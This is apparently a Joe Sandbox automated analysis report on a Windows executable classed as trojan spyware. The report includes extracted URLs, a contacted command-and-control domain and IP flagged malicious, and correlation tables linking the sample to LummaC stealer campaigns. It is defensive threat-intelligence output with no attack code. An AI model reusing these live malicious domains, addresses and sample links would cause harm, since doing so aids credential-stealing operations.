                                                                                                                                              https://store.steampowered.com/stats/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/steam_refunds/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://x1.c.lencr.org/01fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://x1.i.lencr.org/01fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319001fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620161fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/workshop/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.all1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/legal/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://lev-tolstoi.com/api30Qy1fxm3u0d.exe, 00000003.00000003.2258095932.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2257813367.0000000005AE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://lev-tolstoi.com/apidE1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/api01fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://store.steampowered.com/1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://lev-tolstoi.com/A1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://lev-tolstoi.com:443/api1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://lev-tolstoi.com/apic1fxm3u0d.exe, 00000003.00000003.2166952473.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://store.steampowered.com/account/cookiepreferences/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://store.steampowered.com/mobile1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://steamcommunity.com/1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  104.21.66.86
                                                                                                                                                                                                                  lev-tolstoi.comUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                  23.55.153.106
                                                                                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1577311
                                                                                                                                                                                                                  Start date and time:2024-12-18 11:32:05 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 5m 56s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:1fxm3u0d.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/6@11/2
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 20
                                                                                                                                                                                                                  • Number of non-executed functions: 105
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.190.177.23, 172.202.163.200, 13.107.246.63
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target 1fxm3u0d.exe, PID 6596 because there are no executed function
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  05:32:57API Interceptor14x Sleep call for process: 1fxm3u0d.exe modified
                                                                                                                                                                                                                  05:33:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                  23.55.153.1062kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      lev-tolstoi.com2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                      steamcommunity.com2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.121.10.34
                                                                                                                                                                                                                                      DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.121.10.34
                                                                                                                                                                                                                                      he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.121.10.34
                                                                                                                                                                                                                                      SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.121.10.34
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      AKAMAI-ASN1EU2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.44.201.32
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.218.93.195
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                      • 23.43.121.120
                                                                                                                                                                                                                                      https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.116.245.16
                                                                                                                                                                                                                                      https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.232.25.148
                                                                                                                                                                                                                                      jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.235.101.204
                                                                                                                                                                                                                                      https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                      • 23.195.39.65
                                                                                                                                                                                                                                      CLOUDFLARENETUS2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.52.161
                                                                                                                                                                                                                                      Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.10.224
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.23.76
                                                                                                                                                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                      • 172.67.191.110
                                                                                                                                                                                                                                      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                      hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                      Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                      PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                      • 104.26.12.205
                                                                                                                                                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e12kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):0.7039938030067752
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:HngFUEpK3sVhVoI7Rh6tQXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1FhZAX/d5j:HguH3E0BU/gju1zuiFpZ24IO8+
                                                                                                                                                                                                                                      MD5:E266B8BAC0267FD705C33DCCA4EB8404
                                                                                                                                                                                                                                      SHA1:EBDDB0119DA5F9E5D3032AE466BE716DE4CF4D51
                                                                                                                                                                                                                                      SHA-256:37043E4D50DF3F82FAF34038AEC4E965AFA064F06FFC723463CDCE9558C9B533
                                                                                                                                                                                                                                      SHA-512:1B2B2CEEB1BC0904DA1EB9479433426B73C3807E4CAA06ED9982239A31E88C0EB27EA50784F5D9F29F5B21FC9D2E8D765EC348FC387BB2DEF524077F753FD28A
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.1.5.7.7.9.5.6.5.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.1.5.7.8.2.5.3.3.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.e.0.6.b.3.4.-.4.b.5.6.-.4.0.9.5.-.b.0.a.6.-.b.5.2.8.d.a.e.d.4.8.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.f.d.b.c.1.4.-.7.d.b.6.-.4.f.e.2.-.b.5.3.0.-.b.8.9.e.8.8.b.5.5.a.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.f.x.m.3.u.0.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.1.0.-.0.0.0.1.-.0.0.1.4.-.8.e.e.b.-.f.8.3.2.3.8.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.e.5.e.5.8.e.8.1.1.2.2.d.7.7.7.1.7.b.8.d.d.4.e.6.5.f.5.2.8.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.0.6.6.4.6.a.5.5.9.c.d.4.7.d.1.6.9.9.2.6.e.d.5.1.5.6.4.4.d.4.c.a.7.8.f.e.e.c.2.!.1.f.x.m.3.u.0.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Dec 18 10:32:58 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):36488
                                                                                                                                                                                                                                      Entropy (8bit):1.728046993519489
                                                                                                                                                                                                                                      Encrypted:false
